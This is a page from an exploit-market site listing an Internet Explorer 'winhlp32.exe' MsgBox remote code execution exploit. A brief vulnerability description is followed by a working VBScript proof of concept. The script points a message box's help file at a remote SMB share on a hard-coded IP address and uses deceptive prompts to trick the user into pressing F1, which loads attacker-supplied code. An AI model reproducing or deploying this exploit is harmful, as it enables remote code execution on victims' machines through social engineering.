[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Internet Explorer 'winhlp32.exe' 'MsgBox()' Code Execution Vulnerability

Author
Maurycy Prodeus
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11147
Category
remote exploits
Date add
02-03-2010
Platform
unsorted
===============================================================================
Internet Explorer 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability
===============================================================================

Microsoft Internet Explorer is prone to a remote code execution vulnerability.
 
Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the underlying computer.
 
Note attackers must use social-engineering techniques to convince an unsuspecting user to press the 'F1' key when the attacker's message box prompts them to do so.
 
Internet Explorer 6, 7, and 8 are vulnerable when running on the Windows XP platform.
 
<html>
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"
  
//For i=1 to 2500
//  big = big & "\..\"
//Next
  
  
MsgBox "please press F1 to save the world", ,"please save the world",
big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>
</html>



#  0day.today [2024-12-26]  #